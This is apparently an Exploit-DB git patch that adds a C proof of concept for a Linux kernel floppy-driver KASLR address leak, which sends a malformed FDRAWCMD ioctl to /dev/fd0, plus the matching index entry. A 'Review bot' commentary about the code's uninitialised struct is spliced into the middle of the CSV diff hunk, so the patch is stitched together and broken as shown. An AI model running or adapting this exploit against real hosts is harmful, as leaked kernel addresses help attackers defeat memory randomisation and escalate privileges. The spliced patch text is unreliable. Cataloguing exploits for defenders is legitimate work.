From 31a39a07b9610c18f1d856ebde27acacf6af0f7d Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 23 Mar 2018 05:01:51 +0000
Subject: [PATCH] DB: 2018-03-23
1 changes to exploits/shellcodes
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak
---
 exploits/linux/local/44325.c | 40 ++++++++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 41 insertions(+)
 create mode 100644 exploits/linux/local/44325.c
diff --git a/exploits/linux/local/44325.c b/exploits/linux/local/44325.c
new file mode 100644
index 000000000..829f4c1d9
--- /dev/null
+++ b/exploits/linux/local/44325.c
@@ -0,0 +1,40 @@
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+static int drive_selector(int head) {
+ return (head << 2);
+}
+
+void fd_recalibrate(int fd) {
+ struct floppy_raw_cmd raw_cmd;
+ int tmp;
+
+ raw_cmd.flags = FD_RAW_INTR;
+ raw_cmd.cmd_count = 2;
+
+ // set up the command
+ raw_cmd.cmd[raw_cmd.cmd_count++] = 0x07;
+ raw_cmd.cmd[raw_cmd.cmd_count++] = drive_selector(0);
+ tmp = ioctl( fd, FDRAWCMD, &raw_cmd );
+ printf("Status:%d\n",tmp);
+}
+int main(){
+ printf("Start\n");
+ char *d;
+ struct floppy_raw_cmd *cmd;
+
+ int fd;
+ fd = open("/dev/fd0",O_RDWR | O_NDELAY);
+ fd_recalibrate(fd);
+ close(fd);
+ printf("End\n");
+ return 0;
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 50b1367f6..92871fae8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
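Review bot: `fd_recalibrate` sets `raw_cmd.cmd_count = 2;` and then appends with `cmd[raw_cmd.cmd_count++]`, so the RECALIBRATE opcode `0x07` and the drive byte land in `cmd[2]`/`cmd[3]` while `cmd[0]`/`cmd[1]` and every other field of the stack-allocated `raw_cmd` (e.g. `length`, `rate`, `data`) hold uninitialized stack bytes when the struct is handed to the `FDRAWCMD` ioctl. If a plain two-byte command is intended, declare `struct floppy_raw_cmd raw_cmd = {0};` and use `raw_cmd.cmd_count = 0;` before the two appends; if an oversized command with a garbage prefix is what provokes the error path this PoC relies on, a comment should say so, because as written it reads like an off-by-two. `main` also passes the result of `open("/dev/fd0", O_RDWR | O_NDELAY)` straight through without checking for -1, so on a host without that device node the ioctl and `close` just fail with EBADF and only `Status:-1` is printed; a `perror("open")` and early return after the `open` would make the PoC's precondition explicit. The unused `char *d;` and `struct floppy_raw_cmd *cmd;` in `main` should be dropped.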
@@ -9609,6 +9609,7 @@ id,file,description,date,author,type,platform,port
 44313,exploits/windows_x86-64/local/44313.txt,"Microsoft Windows - Desktop Bridge VFS Privilege Escalation",2018-03-20,"Google Security Research",local,windows_x86-64,
 44314,exploits/windows/local/44314.ps1,"Microsoft Windows - Desktop Bridge Virtual Registry Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows,
 44315,exploits/windows/local/44315.txt,"Microsoft Windows - Desktop Bridge Virtual Registry NtLoadKey Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows,
+44325,exploits/linux/local/44325.c,"Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak",2018-03-22,"Gregory Draperi",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139